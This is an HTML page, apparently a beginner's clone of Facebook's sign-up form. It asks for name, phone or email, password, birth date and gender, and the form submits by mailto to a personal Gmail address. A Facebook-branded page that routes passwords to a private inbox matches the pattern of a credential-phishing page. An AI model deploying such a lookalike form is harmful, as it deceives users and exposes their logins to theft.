<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Facebook signUp Page</title>
    <style>
        #some{
            font-family: SFProDisplay-Bold, Helvetica, Arial, sans-serif;
            padding: 10px;
            margin-bottom: -0.3em;
            margin-top: 0em;
           
            
        }
        h5{
            color: rgb(172, 165, 165);
            padding: 10px;
            /* display: flex; */
            margin-top: -em;
            font-size: 15px;
        }
        .box{
            margin: auto;
            width: 428px;
            border: 3px solid rgb(235, 226, 226);
            /* padding: 10px; */
            box-shadow: 0 4px 4px 0 rgba(0, 0, 0, 0.2), 0 4px 10px 0 rgba(0, 0, 0, 0.19);
            height: 560px;
            margin-top: 130px;
            
        }
        
        .Name{
            padding: 11px;
            margin-left: 8px;
            margin-bottom: 7px;
            border-radius: 5px;
            display: flex;
            float: left;      
            height: 17px;
            width:173px;
            background-color: rgb(247, 247, 247);
            font-size: 14px;
            border: 2px solid rgb(187, 185, 185);
            

        }
        .Mobile{
            padding: 11px;
            width: 380px;
            margin-top: 3px;
            margin-left: 7px;
            border-radius: 5px;
            border: 2px solid rgb(187, 185, 185);
            background-color:  rgb(247, 247, 247);
            font-size:14px;
            margin-bottom: 7px;
            height: 17px;
            
        }
        h5{
            margin-top: 1px;
            margin-bottom: -3px;
        }
        #Date{
            width: 130px;
            height: 34px;
            border-radius: 5px;
            margin-left: 7px;
        }
        #Month{
            width: 130px;
            height: 34px;
            border-radius: 5px;
            margin-left: 7px;
        }#Year{
            width: 130px;
            height: 34px;
            border-radius: 5px;
            margin-left: 7px;
            
        }
        #Female{
            width: 190px;
            height: 14px;
            /* border-radius: 5px; */
            margin-left:33px;
            margin-top: 15px;
        }
            .box1{
                margin: auto;
                width: 27%;
                border: 3px solid rgb(235, 226, 226);
                border-radius: 5px;
                margin-top: -1.9em;
                margin-left: 7px;
                padding: 7px;
                
            }
            #Male{
                 width: 200px;
            height: 15px;
            margin-left:170px;
            position: absolute;
            margin-top: -2.2em;
            
            

            }
            .box2{
                margin: auto;
                width: 28%;
                border: 3px solid rgb(235, 226, 226);
                border-radius: 5px;
                margin-top: -2.39em;
                margin-left: 147px;
                padding: 6.8px;
                /* position: absolute; */
            }
            #Custom{
                width: 200px;
            height: 15px;
            margin-left:310px;
            position: absolute;
            margin-top: -2em;
            
            }
            .box3{
                margin: auto;
                width: 27%;
                border: 3px solid rgb(235, 226, 226);
                border-radius: 5px;
                margin-top: -2.4em;
                margin-left: 290px;
                padding: 6.8px;

            }
            .service{
                font-size: 13px;
                /* margin: auto; */
                text-align: left;
                /* text-align: center; */
                color: rgb(149, 152, 155);
            }
            .Button{
                background-color: rgb(19, 182, 19);
                height: 35px;
                width:180px;
                margin-left: 120px;
                margin-top: 30px;
                border-radius: 8px;
                color: white;
                font-size: 17px;
                font-weight: bold;
                font-family: cursive;
                border: none;
            }
            .Button:hover{
                color:black;
                background-color: gray;
            }
                .close
            {
                font-size: 40px;
                font-weight: 700;
                position: absolute;
                margin-top: -11.9em;
                margin-left: 99px;
                
            }
    </style>
</head>
<body>
    <div class="box">
        <H1 id="some">Sign Up</H1>
        <h5>Its quick and easy</h5>
        <hr>
        <form action="mailto: rinic2773@gmail.com" method="post">
            <input type="text" placeholder="First name" class="Name" required name="First name">
            <input type="text" placeholder="Surname" class="Name" name="Surname" required>
            <input type="text" placeholder="Mobile Number or Email Address" class="Mobile" required name="Mobile or Email">
            <input type="password" placeholder="New password" class="Mobile" required name="Password">
            <i class="far fa-eye" id="togglePassword" style="margin-left: 30px; cursor: pointer;"></i>
            <h5>Date of birth</h5>
            <select name="Date" id="Date">
                <option>1</option>
                <option>2</option>
                <option selected>3</option>
                <option>4</option>
                <option>5</option>
                <option>6</option>
                <option>7</option>
                <option>8</option>
                <option>9</option>
                <option>10</option>
                <option>11</option>
                <option>12</option>
                <option>13</option>
                <option>14</option>
                <option>15</option>
                <option>16</option>
                <option>17</option>
                <option>18</option>
                <option>19</option>
                <option>20</option>
                <option>21</option>
                <option>22</option>
                <option>23</option>
                <option>24</option>
                <option>25</option>
                <option>26</option>
                <option>27</option>
                <option>28</option>
                <option>29</option>
                <option>30</option>
                <option>31</option>
            </select>
            <select name="Month" id="Month">
                <option>January</option>
                <option>February</option>
                <option>March</option>
                <option>April</option>
                <option>May</option>
                <option>June</option>
                <option selected>July</option>
                <option>August</option>
                <option>September</option>
                <option>October</option>
                <option>November</option>
                <option>Decemeber</option>

            </select>
            <select name="Year" id="Year">
                <option>2023</option>
                <option>2022</option>
                <option>2021</option>
                <option>2020</option>
                <option>2019</option>
                <option>2018</option>
                <option>2017</option>
                <option>2016</option>
                <option>2015</option>
                <option>2014</option>
                <option>2013</option>
                <option>2012</option>
                <option>2011</option>
                <option>2010</option>
                <option>2009</option>
                <option>2008</option>
                <option>2007</option>
                <option>2006</option>
                <option>2005</option>
                <option>2004</option>
                <option>2003</option>
                <option>2002</option>
                <option>2001</option>
                <option>2000</option>
                <option>1999</option>
                <option>1998</option>
                <option>1997</option>
                <option>1996</option>
                <option>1995</option>
                <option>1994</option>
                <option>1993</option>
                <option>1992</option>
                <option>1991</option>
                <option>1990</option>
                <option>1989</option>

            </select>
            <h5>Gender</h5>
            <input type="radio" name="Gender" id="Female" value="Female">
            <div class="box1">
                &nbsp;Female 

                </div>
                <input type="radio" name="Gender" id="Male" value="Male">
                <div class="box2">
                   &nbsp; Male
                </div>
                <input type="radio" name="Gender" id="Custom" value="Custom">
                <div class="box3">
                    &nbsp;Custom
                </div>
                <div class="service">
                    
                <br>
                &nbsp;People who use our service may have uploaded your contact information to &nbsp;Facebook. Learn more.
            </div>
                    <div class="service">
                        <br>
                        &nbsp;By clicking Sign Up, you agree to our Terms, Privacy Policy and Cookies Policy. &nbsp;You may receive SMS notifications from us and can opt out at any time.
                    </div>
                    <input type="submit" value="Sign Up" class="Button">
                    <span class="close">&times;</span>
                        
        </form>
        
    
</body>
</html>
